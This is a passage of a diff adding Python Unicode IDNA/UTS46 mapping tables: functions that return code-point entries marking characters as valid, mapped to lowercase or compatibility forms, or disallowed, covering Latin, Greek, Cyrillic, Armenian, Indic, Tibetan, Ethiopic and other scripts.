+ (0x230, 'M', 'ȱ'), + (0x231, 'V'), + (0x232, 'M', 'ȳ'), + (0x233, 'V'), + (0x23A, 'M', 'ⱥ'), + (0x23B, 'M', 'ȼ'), + (0x23C, 'V'), + (0x23D, 'M', 'ƚ'), + (0x23E, 'M', 'ⱦ'), + (0x23F, 'V'), + (0x241, 'M', 'ɂ'), + (0x242, 'V'), + (0x243, 'M', 'ƀ'), + (0x244, 'M', 'ʉ'), + (0x245, 'M', 'ʌ'), + (0x246, 'M', 'ɇ'), + (0x247, 'V'), + (0x248, 'M', 'ɉ'), + (0x249, 'V'), + (0x24A, 'M', 'ɋ'), + (0x24B, 'V'), + (0x24C, 'M', 'ɍ'), + (0x24D, 'V'), + (0x24E, 'M', 'ɏ'), + (0x24F, 'V'), + (0x2B0, 'M', 'h'), + (0x2B1, 'M', 'ɦ'), + (0x2B2, 'M', 'j'), + (0x2B3, 'M', 'r'), + (0x2B4, 'M', 'ɹ'), + (0x2B5, 'M', 'ɻ'), + (0x2B6, 'M', 'ʁ'), + (0x2B7, 'M', 'w'), + (0x2B8, 'M', 'y'), + (0x2B9, 'V'), + (0x2D8, '3', ' ̆'), + (0x2D9, '3', ' ̇'), + (0x2DA, '3', ' ̊'), + (0x2DB, '3', ' ̨'), + (0x2DC, '3', ' ̃'), + (0x2DD, '3', ' ̋'), + (0x2DE, 'V'), + (0x2E0, 'M', 'ɣ'), + (0x2E1, 'M', 'l'), + (0x2E2, 'M', 's'), + (0x2E3, 'M', 'x'), + (0x2E4, 'M', 'ʕ'), + (0x2E5, 'V'), + (0x340, 'M', '̀'), + (0x341, 'M', '́'), + (0x342, 'V'), + (0x343, 'M', '̓'), + (0x344, 'M', '̈́'), + (0x345, 'M', 'ι'), + (0x346, 'V'), + (0x34F, 'I'), + (0x350, 'V'), + (0x370, 'M', 'ͱ'), + (0x371, 'V'), + (0x372, 'M', 'ͳ'), + (0x373, 'V'), + (0x374, 'M', 'ʹ'), + (0x375, 'V'), + (0x376, 'M', 'ͷ'), + (0x377, 'V'), + ] + +def _seg_6() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x378, 'X'), + (0x37A, '3', ' ι'), + (0x37B, 'V'), + (0x37E, '3', ';'), + (0x37F, 'M', 'ϳ'), + (0x380, 'X'), + (0x384, '3', ' ́'), + (0x385, '3', ' ̈́'), + (0x386, 'M', 'ά'), + (0x387, 'M', '·'), + (0x388, 'M', 'έ'), + (0x389, 'M', 'ή'), + (0x38A, 'M', 'ί'), + (0x38B, 'X'), + (0x38C, 'M', 'ό'), + (0x38D, 'X'), + (0x38E, 'M', 'ύ'), + (0x38F, 'M', 'ώ'), + (0x390, 'V'), + (0x391, 'M', 'α'), + (0x392, 'M', 'β'), + (0x393, 'M', 'γ'), + (0x394, 'M', 'δ'), + (0x395, 'M', 'ε'), + (0x396, 'M', 'ζ'), + (0x397, 'M', 'η'), + (0x398, 'M', 'θ'), + (0x399, 'M', 'ι'), + (0x39A, 'M', 'κ'), + (0x39B, 'M', 'λ'), + (0x39C, 'M', 'μ'), + (0x39D, 'M', 'ν'), + (0x39E, 'M', 'ξ'), + (0x39F, 'M', 'ο'), + (0x3A0, 'M', 'π'), + (0x3A1, 'M', 'ρ'), + (0x3A2, 'X'), + (0x3A3, 'M', 'σ'), + (0x3A4, 'M', 'τ'), + (0x3A5, 'M', 'υ'), + (0x3A6, 'M', 'φ'), + (0x3A7, 'M', 'χ'), + (0x3A8, 'M', 'ψ'), + (0x3A9, 'M', 'ω'), + (0x3AA, 'M', 'ϊ'), + (0x3AB, 'M', 'ϋ'), + (0x3AC, 'V'), + (0x3C2, 'D', 'σ'), + (0x3C3, 'V'), + (0x3CF, 'M', 'ϗ'), + (0x3D0, 'M', 'β'), + (0x3D1, 'M', 'θ'), + (0x3D2, 'M', 'υ'), + (0x3D3, 'M', 'ύ'), + (0x3D4, 'M', 'ϋ'), + (0x3D5, 'M', 'φ'), + (0x3D6, 'M', 'π'), + (0x3D7, 'V'), + (0x3D8, 'M', 'ϙ'), + (0x3D9, 'V'), + (0x3DA, 'M', 'ϛ'), + (0x3DB, 'V'), + (0x3DC, 'M', 'ϝ'), + (0x3DD, 'V'), + (0x3DE, 'M', 'ϟ'), + (0x3DF, 'V'), + (0x3E0, 'M', 'ϡ'), + (0x3E1, 'V'), + (0x3E2, 'M', 'ϣ'), + (0x3E3, 'V'), + (0x3E4, 'M', 'ϥ'), + (0x3E5, 'V'), + (0x3E6, 'M', 'ϧ'), + (0x3E7, 'V'), + (0x3E8, 'M', 'ϩ'), + (0x3E9, 'V'), + (0x3EA, 'M', 'ϫ'), + (0x3EB, 'V'), + (0x3EC, 'M', 'ϭ'), + (0x3ED, 'V'), + (0x3EE, 'M', 'ϯ'), + (0x3EF, 'V'), + (0x3F0, 'M', 'κ'), + (0x3F1, 'M', 'ρ'), + (0x3F2, 'M', 'σ'), + (0x3F3, 'V'), + (0x3F4, 'M', 'θ'), + (0x3F5, 'M', 'ε'), + (0x3F6, 'V'), + (0x3F7, 'M', 'ϸ'), + (0x3F8, 'V'), + (0x3F9, 'M', 'σ'), + (0x3FA, 'M', 'ϻ'), + (0x3FB, 'V'), + (0x3FD, 'M', 'ͻ'), + (0x3FE, 'M', 'ͼ'), + (0x3FF, 'M', 'ͽ'), + (0x400, 'M', 'ѐ'), + (0x401, 'M', 'ё'), + (0x402, 'M', 'ђ'), + ] + +def _seg_7() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x403, 'M', 'ѓ'), + (0x404, 'M', 'є'), + (0x405, 'M', 'ѕ'), + (0x406, 'M', 'і'), + (0x407, 'M', 'ї'), + (0x408, 'M', 'ј'), + (0x409, 'M', 'љ'), + (0x40A, 'M', 'њ'), + (0x40B, 'M', 'ћ'), + (0x40C, 'M', 'ќ'), + (0x40D, 'M', 'ѝ'), + (0x40E, 'M', 'ў'), + (0x40F, 'M', 'џ'), + (0x410, 'M', 'а'), + (0x411, 'M', 'б'), + (0x412, 'M', 'в'), + (0x413, 'M', 'г'), + (0x414, 'M', 'д'), + (0x415, 'M', 'е'), + (0x416, 'M', 'ж'), + (0x417, 'M', 'з'), + (0x418, 'M', 'и'), + (0x419, 'M', 'й'), + (0x41A, 'M', 'к'), + (0x41B, 'M', 'л'), + (0x41C, 'M', 'м'), + (0x41D, 'M', 'н'), + (0x41E, 'M', 'о'), + (0x41F, 'M', 'п'), + (0x420, 'M', 'р'), + (0x421, 'M', 'с'), + (0x422, 'M', 'т'), + (0x423, 'M', 'у'), + (0x424, 'M', 'ф'), + (0x425, 'M', 'х'), + (0x426, 'M', 'ц'), + (0x427, 'M', 'ч'), + (0x428, 'M', 'ш'), + (0x429, 'M', 'щ'), + (0x42A, 'M', 'ъ'), + (0x42B, 'M', 'ы'), + (0x42C, 'M', 'ь'), + (0x42D, 'M', 'э'), + (0x42E, 'M', 'ю'), + (0x42F, 'M', 'я'), + (0x430, 'V'), + (0x460, 'M', 'ѡ'), + (0x461, 'V'), + (0x462, 'M', 'ѣ'), + (0x463, 'V'), + (0x464, 'M', 'ѥ'), + (0x465, 'V'), + (0x466, 'M', 'ѧ'), + (0x467, 'V'), + (0x468, 'M', 'ѩ'), + (0x469, 'V'), + (0x46A, 'M', 'ѫ'), + (0x46B, 'V'), + (0x46C, 'M', 'ѭ'), + (0x46D, 'V'), + (0x46E, 'M', 'ѯ'), + (0x46F, 'V'), + (0x470, 'M', 'ѱ'), + (0x471, 'V'), + (0x472, 'M', 'ѳ'), + (0x473, 'V'), + (0x474, 'M', 'ѵ'), + (0x475, 'V'), + (0x476, 'M', 'ѷ'), + (0x477, 'V'), + (0x478, 'M', 'ѹ'), + (0x479, 'V'), + (0x47A, 'M', 'ѻ'), + (0x47B, 'V'), + (0x47C, 'M', 'ѽ'), + (0x47D, 'V'), + (0x47E, 'M', 'ѿ'), + (0x47F, 'V'), + (0x480, 'M', 'ҁ'), + (0x481, 'V'), + (0x48A, 'M', 'ҋ'), + (0x48B, 'V'), + (0x48C, 'M', 'ҍ'), + (0x48D, 'V'), + (0x48E, 'M', 'ҏ'), + (0x48F, 'V'), + (0x490, 'M', 'ґ'), + (0x491, 'V'), + (0x492, 'M', 'ғ'), + (0x493, 'V'), + (0x494, 'M', 'ҕ'), + (0x495, 'V'), + (0x496, 'M', 'җ'), + (0x497, 'V'), + (0x498, 'M', 'ҙ'), + (0x499, 'V'), + (0x49A, 'M', 'қ'), + (0x49B, 'V'), + (0x49C, 'M', 'ҝ'), + (0x49D, 'V'), + ] + +def _seg_8() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x49E, 'M', 'ҟ'), + (0x49F, 'V'), + (0x4A0, 'M', 'ҡ'), + (0x4A1, 'V'), + (0x4A2, 'M', 'ң'), + (0x4A3, 'V'), + (0x4A4, 'M', 'ҥ'), + (0x4A5, 'V'), + (0x4A6, 'M', 'ҧ'), + (0x4A7, 'V'), + (0x4A8, 'M', 'ҩ'), + (0x4A9, 'V'), + (0x4AA, 'M', 'ҫ'), + (0x4AB, 'V'), + (0x4AC, 'M', 'ҭ'), + (0x4AD, 'V'), + (0x4AE, 'M', 'ү'), + (0x4AF, 'V'), + (0x4B0, 'M', 'ұ'), + (0x4B1, 'V'), + (0x4B2, 'M', 'ҳ'), + (0x4B3, 'V'), + (0x4B4, 'M', 'ҵ'), + (0x4B5, 'V'), + (0x4B6, 'M', 'ҷ'), + (0x4B7, 'V'), + (0x4B8, 'M', 'ҹ'), + (0x4B9, 'V'), + (0x4BA, 'M', 'һ'), + (0x4BB, 'V'), + (0x4BC, 'M', 'ҽ'), + (0x4BD, 'V'), + (0x4BE, 'M', 'ҿ'), + (0x4BF, 'V'), + (0x4C0, 'X'), + (0x4C1, 'M', 'ӂ'), + (0x4C2, 'V'), + (0x4C3, 'M', 'ӄ'), + (0x4C4, 'V'), + (0x4C5, 'M', 'ӆ'), + (0x4C6, 'V'), + (0x4C7, 'M', 'ӈ'), + (0x4C8, 'V'), + (0x4C9, 'M', 'ӊ'), + (0x4CA, 'V'), + (0x4CB, 'M', 'ӌ'), + (0x4CC, 'V'), + (0x4CD, 'M', 'ӎ'), + (0x4CE, 'V'), + (0x4D0, 'M', 'ӑ'), + (0x4D1, 'V'), + (0x4D2, 'M', 'ӓ'), + (0x4D3, 'V'), + (0x4D4, 'M', 'ӕ'), + (0x4D5, 'V'), + (0x4D6, 'M', 'ӗ'), + (0x4D7, 'V'), + (0x4D8, 'M', 'ә'), + (0x4D9, 'V'), + (0x4DA, 'M', 'ӛ'), + (0x4DB, 'V'), + (0x4DC, 'M', 'ӝ'), + (0x4DD, 'V'), + (0x4DE, 'M', 'ӟ'), + (0x4DF, 'V'), + (0x4E0, 'M', 'ӡ'), + (0x4E1, 'V'), + (0x4E2, 'M', 'ӣ'), + (0x4E3, 'V'), + (0x4E4, 'M', 'ӥ'), + (0x4E5, 'V'), + (0x4E6, 'M', 'ӧ'), + (0x4E7, 'V'), + (0x4E8, 'M', 'ө'), + (0x4E9, 'V'), + (0x4EA, 'M', 'ӫ'), + (0x4EB, 'V'), + (0x4EC, 'M', 'ӭ'), + (0x4ED, 'V'), + (0x4EE, 'M', 'ӯ'), + (0x4EF, 'V'), + (0x4F0, 'M', 'ӱ'), + (0x4F1, 'V'), + (0x4F2, 'M', 'ӳ'), + (0x4F3, 'V'), + (0x4F4, 'M', 'ӵ'), + (0x4F5, 'V'), + (0x4F6, 'M', 'ӷ'), + (0x4F7, 'V'), + (0x4F8, 'M', 'ӹ'), + (0x4F9, 'V'), + (0x4FA, 'M', 'ӻ'), + (0x4FB, 'V'), + (0x4FC, 'M', 'ӽ'), + (0x4FD, 'V'), + (0x4FE, 'M', 'ӿ'), + (0x4FF, 'V'), + (0x500, 'M', 'ԁ'), + (0x501, 'V'), + (0x502, 'M', 'ԃ'), + ] + +def _seg_9() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x503, 'V'), + (0x504, 'M', 'ԅ'), + (0x505, 'V'), + (0x506, 'M', 'ԇ'), + (0x507, 'V'), + (0x508, 'M', 'ԉ'), + (0x509, 'V'), + (0x50A, 'M', 'ԋ'), + (0x50B, 'V'), + (0x50C, 'M', 'ԍ'), + (0x50D, 'V'), + (0x50E, 'M', 'ԏ'), + (0x50F, 'V'), + (0x510, 'M', 'ԑ'), + (0x511, 'V'), + (0x512, 'M', 'ԓ'), + (0x513, 'V'), + (0x514, 'M', 'ԕ'), + (0x515, 'V'), + (0x516, 'M', 'ԗ'), + (0x517, 'V'), + (0x518, 'M', 'ԙ'), + (0x519, 'V'), + (0x51A, 'M', 'ԛ'), + (0x51B, 'V'), + (0x51C, 'M', 'ԝ'), + (0x51D, 'V'), + (0x51E, 'M', 'ԟ'), + (0x51F, 'V'), + (0x520, 'M', 'ԡ'), + (0x521, 'V'), + (0x522, 'M', 'ԣ'), + (0x523, 'V'), + (0x524, 'M', 'ԥ'), + (0x525, 'V'), + (0x526, 'M', 'ԧ'), + (0x527, 'V'), + (0x528, 'M', 'ԩ'), + (0x529, 'V'), + (0x52A, 'M', 'ԫ'), + (0x52B, 'V'), + (0x52C, 'M', 'ԭ'), + (0x52D, 'V'), + (0x52E, 'M', 'ԯ'), + (0x52F, 'V'), + (0x530, 'X'), + (0x531, 'M', 'ա'), + (0x532, 'M', 'բ'), + (0x533, 'M', 'գ'), + (0x534, 'M', 'դ'), + (0x535, 'M', 'ե'), + (0x536, 'M', 'զ'), + (0x537, 'M', 'է'), + (0x538, 'M', 'ը'), + (0x539, 'M', 'թ'), + (0x53A, 'M', 'ժ'), + (0x53B, 'M', 'ի'), + (0x53C, 'M', 'լ'), + (0x53D, 'M', 'խ'), + (0x53E, 'M', 'ծ'), + (0x53F, 'M', 'կ'), + (0x540, 'M', 'հ'), + (0x541, 'M', 'ձ'), + (0x542, 'M', 'ղ'), + (0x543, 'M', 'ճ'), + (0x544, 'M', 'մ'), + (0x545, 'M', 'յ'), + (0x546, 'M', 'ն'), + (0x547, 'M', 'շ'), + (0x548, 'M', 'ո'), + (0x549, 'M', 'չ'), + (0x54A, 'M', 'պ'), + (0x54B, 'M', 'ջ'), + (0x54C, 'M', 'ռ'), + (0x54D, 'M', 'ս'), + (0x54E, 'M', 'վ'), + (0x54F, 'M', 'տ'), + (0x550, 'M', 'ր'), + (0x551, 'M', 'ց'), + (0x552, 'M', 'ւ'), + (0x553, 'M', 'փ'), + (0x554, 'M', 'ք'), + (0x555, 'M', 'օ'), + (0x556, 'M', 'ֆ'), + (0x557, 'X'), + (0x559, 'V'), + (0x587, 'M', 'եւ'), + (0x588, 'V'), + (0x58B, 'X'), + (0x58D, 'V'), + (0x590, 'X'), + (0x591, 'V'), + (0x5C8, 'X'), + (0x5D0, 'V'), + (0x5EB, 'X'), + (0x5EF, 'V'), + (0x5F5, 'X'), + (0x606, 'V'), + (0x61C, 'X'), + (0x61D, 'V'), + ] + +def _seg_10() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x675, 'M', 'اٴ'), + (0x676, 'M', 'وٴ'), + (0x677, 'M', 'ۇٴ'), + (0x678, 'M', 'يٴ'), + (0x679, 'V'), + (0x6DD, 'X'), + (0x6DE, 'V'), + (0x70E, 'X'), + (0x710, 'V'), + (0x74B, 'X'), + (0x74D, 'V'), + (0x7B2, 'X'), + (0x7C0, 'V'), + (0x7FB, 'X'), + (0x7FD, 'V'), + (0x82E, 'X'), + (0x830, 'V'), + (0x83F, 'X'), + (0x840, 'V'), + (0x85C, 'X'), + (0x85E, 'V'), + (0x85F, 'X'), + (0x860, 'V'), + (0x86B, 'X'), + (0x870, 'V'), + (0x88F, 'X'), + (0x898, 'V'), + (0x8E2, 'X'), + (0x8E3, 'V'), + (0x958, 'M', 'क़'), + (0x959, 'M', 'ख़'), + (0x95A, 'M', 'ग़'), + (0x95B, 'M', 'ज़'), + (0x95C, 'M', 'ड़'), + (0x95D, 'M', 'ढ़'), + (0x95E, 'M', 'फ़'), + (0x95F, 'M', 'य़'), + (0x960, 'V'), + (0x984, 'X'), + (0x985, 'V'), + (0x98D, 'X'), + (0x98F, 'V'), + (0x991, 'X'), + (0x993, 'V'), + (0x9A9, 'X'), + (0x9AA, 'V'), + (0x9B1, 'X'), + (0x9B2, 'V'), + (0x9B3, 'X'), + (0x9B6, 'V'), + (0x9BA, 'X'), + (0x9BC, 'V'), + (0x9C5, 'X'), + (0x9C7, 'V'), + (0x9C9, 'X'), + (0x9CB, 'V'), + (0x9CF, 'X'), + (0x9D7, 'V'), + (0x9D8, 'X'), + (0x9DC, 'M', 'ড়'), + (0x9DD, 'M', 'ঢ়'), + (0x9DE, 'X'), + (0x9DF, 'M', 'য়'), + (0x9E0, 'V'), + (0x9E4, 'X'), + (0x9E6, 'V'), + (0x9FF, 'X'), + (0xA01, 'V'), + (0xA04, 'X'), + (0xA05, 'V'), + (0xA0B, 'X'), + (0xA0F, 'V'), + (0xA11, 'X'), + (0xA13, 'V'), + (0xA29, 'X'), + (0xA2A, 'V'), + (0xA31, 'X'), + (0xA32, 'V'), + (0xA33, 'M', 'ਲ਼'), + (0xA34, 'X'), + (0xA35, 'V'), + (0xA36, 'M', 'ਸ਼'), + (0xA37, 'X'), + (0xA38, 'V'), + (0xA3A, 'X'), + (0xA3C, 'V'), + (0xA3D, 'X'), + (0xA3E, 'V'), + (0xA43, 'X'), + (0xA47, 'V'), + (0xA49, 'X'), + (0xA4B, 'V'), + (0xA4E, 'X'), + (0xA51, 'V'), + (0xA52, 'X'), + (0xA59, 'M', 'ਖ਼'), + (0xA5A, 'M', 'ਗ਼'), + (0xA5B, 'M', 'ਜ਼'), + (0xA5C, 'V'), + (0xA5D, 'X'), + ] + +def _seg_11() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xA5E, 'M', 'ਫ਼'), + (0xA5F, 'X'), + (0xA66, 'V'), + (0xA77, 'X'), + (0xA81, 'V'), + (0xA84, 'X'), + (0xA85, 'V'), + (0xA8E, 'X'), + (0xA8F, 'V'), + (0xA92, 'X'), + (0xA93, 'V'), + (0xAA9, 'X'), + (0xAAA, 'V'), + (0xAB1, 'X'), + (0xAB2, 'V'), + (0xAB4, 'X'), + (0xAB5, 'V'), + (0xABA, 'X'), + (0xABC, 'V'), + (0xAC6, 'X'), + (0xAC7, 'V'), + (0xACA, 'X'), + (0xACB, 'V'), + (0xACE, 'X'), + (0xAD0, 'V'), + (0xAD1, 'X'), + (0xAE0, 'V'), + (0xAE4, 'X'), + (0xAE6, 'V'), + (0xAF2, 'X'), + (0xAF9, 'V'), + (0xB00, 'X'), + (0xB01, 'V'), + (0xB04, 'X'), + (0xB05, 'V'), + (0xB0D, 'X'), + (0xB0F, 'V'), + (0xB11, 'X'), + (0xB13, 'V'), + (0xB29, 'X'), + (0xB2A, 'V'), + (0xB31, 'X'), + (0xB32, 'V'), + (0xB34, 'X'), + (0xB35, 'V'), + (0xB3A, 'X'), + (0xB3C, 'V'), + (0xB45, 'X'), + (0xB47, 'V'), + (0xB49, 'X'), + (0xB4B, 'V'), + (0xB4E, 'X'), + (0xB55, 'V'), + (0xB58, 'X'), + (0xB5C, 'M', 'ଡ଼'), + (0xB5D, 'M', 'ଢ଼'), + (0xB5E, 'X'), + (0xB5F, 'V'), + (0xB64, 'X'), + (0xB66, 'V'), + (0xB78, 'X'), + (0xB82, 'V'), + (0xB84, 'X'), + (0xB85, 'V'), + (0xB8B, 'X'), + (0xB8E, 'V'), + (0xB91, 'X'), + (0xB92, 'V'), + (0xB96, 'X'), + (0xB99, 'V'), + (0xB9B, 'X'), + (0xB9C, 'V'), + (0xB9D, 'X'), + (0xB9E, 'V'), + (0xBA0, 'X'), + (0xBA3, 'V'), + (0xBA5, 'X'), + (0xBA8, 'V'), + (0xBAB, 'X'), + (0xBAE, 'V'), + (0xBBA, 'X'), + (0xBBE, 'V'), + (0xBC3, 'X'), + (0xBC6, 'V'), + (0xBC9, 'X'), + (0xBCA, 'V'), + (0xBCE, 'X'), + (0xBD0, 'V'), + (0xBD1, 'X'), + (0xBD7, 'V'), + (0xBD8, 'X'), + (0xBE6, 'V'), + (0xBFB, 'X'), + (0xC00, 'V'), + (0xC0D, 'X'), + (0xC0E, 'V'), + (0xC11, 'X'), + (0xC12, 'V'), + (0xC29, 'X'), + (0xC2A, 'V'), + ] + +def _seg_12() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xC3A, 'X'), + (0xC3C, 'V'), + (0xC45, 'X'), + (0xC46, 'V'), + (0xC49, 'X'), + (0xC4A, 'V'), + (0xC4E, 'X'), + (0xC55, 'V'), + (0xC57, 'X'), + (0xC58, 'V'), + (0xC5B, 'X'), + (0xC5D, 'V'), + (0xC5E, 'X'), + (0xC60, 'V'), + (0xC64, 'X'), + (0xC66, 'V'), + (0xC70, 'X'), + (0xC77, 'V'), + (0xC8D, 'X'), + (0xC8E, 'V'), + (0xC91, 'X'), + (0xC92, 'V'), + (0xCA9, 'X'), + (0xCAA, 'V'), + (0xCB4, 'X'), + (0xCB5, 'V'), + (0xCBA, 'X'), + (0xCBC, 'V'), + (0xCC5, 'X'), + (0xCC6, 'V'), + (0xCC9, 'X'), + (0xCCA, 'V'), + (0xCCE, 'X'), + (0xCD5, 'V'), + (0xCD7, 'X'), + (0xCDD, 'V'), + (0xCDF, 'X'), + (0xCE0, 'V'), + (0xCE4, 'X'), + (0xCE6, 'V'), + (0xCF0, 'X'), + (0xCF1, 'V'), + (0xCF3, 'X'), + (0xD00, 'V'), + (0xD0D, 'X'), + (0xD0E, 'V'), + (0xD11, 'X'), + (0xD12, 'V'), + (0xD45, 'X'), + (0xD46, 'V'), + (0xD49, 'X'), + (0xD4A, 'V'), + (0xD50, 'X'), + (0xD54, 'V'), + (0xD64, 'X'), + (0xD66, 'V'), + (0xD80, 'X'), + (0xD81, 'V'), + (0xD84, 'X'), + (0xD85, 'V'), + (0xD97, 'X'), + (0xD9A, 'V'), + (0xDB2, 'X'), + (0xDB3, 'V'), + (0xDBC, 'X'), + (0xDBD, 'V'), + (0xDBE, 'X'), + (0xDC0, 'V'), + (0xDC7, 'X'), + (0xDCA, 'V'), + (0xDCB, 'X'), + (0xDCF, 'V'), + (0xDD5, 'X'), + (0xDD6, 'V'), + (0xDD7, 'X'), + (0xDD8, 'V'), + (0xDE0, 'X'), + (0xDE6, 'V'), + (0xDF0, 'X'), + (0xDF2, 'V'), + (0xDF5, 'X'), + (0xE01, 'V'), + (0xE33, 'M', 'ํา'), + (0xE34, 'V'), + (0xE3B, 'X'), + (0xE3F, 'V'), + (0xE5C, 'X'), + (0xE81, 'V'), + (0xE83, 'X'), + (0xE84, 'V'), + (0xE85, 'X'), + (0xE86, 'V'), + (0xE8B, 'X'), + (0xE8C, 'V'), + (0xEA4, 'X'), + (0xEA5, 'V'), + (0xEA6, 'X'), + (0xEA7, 'V'), + (0xEB3, 'M', 'ໍາ'), + (0xEB4, 'V'), + ] + +def _seg_13() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xEBE, 'X'), + (0xEC0, 'V'), + (0xEC5, 'X'), + (0xEC6, 'V'), + (0xEC7, 'X'), + (0xEC8, 'V'), + (0xECE, 'X'), + (0xED0, 'V'), + (0xEDA, 'X'), + (0xEDC, 'M', 'ຫນ'), + (0xEDD, 'M', 'ຫມ'), + (0xEDE, 'V'), + (0xEE0, 'X'), + (0xF00, 'V'), + (0xF0C, 'M', '་'), + (0xF0D, 'V'), + (0xF43, 'M', 'གྷ'), + (0xF44, 'V'), + (0xF48, 'X'), + (0xF49, 'V'), + (0xF4D, 'M', 'ཌྷ'), + (0xF4E, 'V'), + (0xF52, 'M', 'དྷ'), + (0xF53, 'V'), + (0xF57, 'M', 'བྷ'), + (0xF58, 'V'), + (0xF5C, 'M', 'ཛྷ'), + (0xF5D, 'V'), + (0xF69, 'M', 'ཀྵ'), + (0xF6A, 'V'), + (0xF6D, 'X'), + (0xF71, 'V'), + (0xF73, 'M', 'ཱི'), + (0xF74, 'V'), + (0xF75, 'M', 'ཱུ'), + (0xF76, 'M', 'ྲྀ'), + (0xF77, 'M', 'ྲཱྀ'), + (0xF78, 'M', 'ླྀ'), + (0xF79, 'M', 'ླཱྀ'), + (0xF7A, 'V'), + (0xF81, 'M', 'ཱྀ'), + (0xF82, 'V'), + (0xF93, 'M', 'ྒྷ'), + (0xF94, 'V'), + (0xF98, 'X'), + (0xF99, 'V'), + (0xF9D, 'M', 'ྜྷ'), + (0xF9E, 'V'), + (0xFA2, 'M', 'ྡྷ'), + (0xFA3, 'V'), + (0xFA7, 'M', 'ྦྷ'), + (0xFA8, 'V'), + (0xFAC, 'M', 'ྫྷ'), + (0xFAD, 'V'), + (0xFB9, 'M', 'ྐྵ'), + (0xFBA, 'V'), + (0xFBD, 'X'), + (0xFBE, 'V'), + (0xFCD, 'X'), + (0xFCE, 'V'), + (0xFDB, 'X'), + (0x1000, 'V'), + (0x10A0, 'X'), + (0x10C7, 'M', 'ⴧ'), + (0x10C8, 'X'), + (0x10CD, 'M', 'ⴭ'), + (0x10CE, 'X'), + (0x10D0, 'V'), + (0x10FC, 'M', 'ნ'), + (0x10FD, 'V'), + (0x115F, 'X'), + (0x1161, 'V'), + (0x1249, 'X'), + (0x124A, 'V'), + (0x124E, 'X'), + (0x1250, 'V'), + (0x1257, 'X'), + (0x1258, 'V'), + (0x1259, 'X'), + (0x125A, 'V'), + (0x125E, 'X'), + (0x1260, 'V'), + (0x1289, 'X'), + (0x128A, 'V'), + (0x128E, 'X'), + (0x1290, 'V'), + (0x12B1, 'X'), + (0x12B2, 'V'), + (0x12B6, 'X'), + (0x12B8, 'V'), + (0x12BF, 'X'), + (0x12C0, 'V'), + (0x12C1, 'X'), + (0x12C2, 'V'), + (0x12C6, 'X'), + (0x12C8, 'V'), + (0x12D7, 'X'), + (0x12D8, 'V'), + (0x1311, 'X'), + (0x1312, 'V'), + ] + +def _seg_14() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1316, 'X'), + (0x1318, 'V'), + (0x135B, 'X'), + (0x135D, 'V'), + (0x137D, 'X'), + (0x1380, 'V'), + (0x139A, 'X'), + (0x13A0, 'V'), + (0x13F6, 'X'), + (0x13F8, 'M', 'Ᏸ'), + (0x13F9, 'M', 'Ᏹ'), + (0x13FA, 'M', 'Ᏺ'), + (0x13FB, 'M', 'Ᏻ'), + (0x13FC, 'M', 'Ᏼ'), + (0x13FD, 'M', 'Ᏽ'), + (0x13FE, 'X'), + (0x1400, 'V'), + (0x1680, 'X'), + (0x1681, 'V'), + (0x169D, 'X'), + (0x16A0, 'V'), + (0x16F9, 'X'), + (0x1700, 'V'), + (0x1716, 'X'), + (0x171F, 'V'), + (0x1737, 'X'), + (0x1740, 'V'), + (0x1754, 'X'), + (0x1760, 'V'), + (0x176D, 'X'), + (0x176E, 'V'), + (0x1771, 'X'), + (0x1772, 'V'), + (0x1774, 'X'), + (0x1780, 'V'), + (0x17B4, 'X'), + (0x17B6, 'V'), + (0x17DE, 'X'), + (0x17E0, 'V'), + (0x17EA, 'X'), + (0x17F0, 'V'), + (0x17FA, 'X'), + (0x1800, 'V'), + (0x1806, 'X'), + (0x1807, 'V'), + (0x180B, 'I'), + (0x180E, 'X'), + (0x180F, 'I'), + (0x1810, 'V'), + (0x181A, 'X'), + (0x1820, 'V'), + (0x1879, 'X'), + (0x1880, 'V'), + (0x18AB, 'X'), + (0x18B0, 'V'), + (0x18F6, 'X'), + (0x1900, 'V'), + (0x191F, 'X'), + (0x1920, 'V'), + (0x192C, 'X'), + (0x1930, 'V'), + (0x193C, 'X'), + (0x1940, 'V'), + (0x1941, 'X'), + (0x1944, 'V'), + (0x196E, 'X'), + (0x1970, 'V'), + (0x1975, 'X'), + (0x1980, 'V'), + (0x19AC, 'X'), + (0x19B0, 'V'), + (0x19CA, 'X'), + (0x19D0, 'V'), + (0x19DB, 'X'), + (0x19DE, 'V'), + (0x1A1C, 'X'), + (0x1A1E, 'V'), + (0x1A5F, 'X'), + (0x1A60, 'V'), + (0x1A7D, 'X'), + (0x1A7F, 'V'), + (0x1A8A, 'X'), + (0x1A90, 'V'), + (0x1A9A, 'X'), + (0x1AA0, 'V'), + (0x1AAE, 'X'), + (0x1AB0, 'V'), + (0x1ACF, 'X'), + (0x1B00, 'V'), + (0x1B4D, 'X'), + (0x1B50, 'V'), + (0x1B7F, 'X'), + (0x1B80, 'V'), + (0x1BF4, 'X'), + (0x1BFC, 'V'), + (0x1C38, 'X'), + (0x1C3B, 'V'), + (0x1C4A, 'X'), + (0x1C4D, 'V'), + (0x1C80, 'M', 'в'), + ] + +def _seg_15() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1C81, 'M', 'д'), + (0x1C82, 'M', 'о'), + (0x1C83, 'M', 'с'), + (0x1C84, 'M', 'т'), + (0x1C86, 'M', 'ъ'), + (0x1C87, 'M', 'ѣ'), + (0x1C88, 'M', 'ꙋ'), + (0x1C89, 'X'), + (0x1C90, 'M', 'ა'), + (0x1C91, 'M', 'ბ'), + (0x1C92, 'M', 'გ'), + (0x1C93, 'M', 'დ'), + (0x1C94, 'M', 'ე'), + (0x1C95, 'M', 'ვ'), + (0x1C96, 'M', 'ზ'), + (0x1C97, 'M', 'თ'), + (0x1C98, 'M', 'ი'), + (0x1C99, 'M', 'კ'), + (0x1C9A, 'M', 'ლ'), + (0x1C9B, 'M', 'მ'), + (0x1C9C, 'M', 'ნ'), + (0x1C9D, 'M', 'ო'), + (0x1C9E, 'M', 'პ'), + (0x1C9F, 'M', 'ჟ'), + (0x1CA0, 'M', 'რ'), + 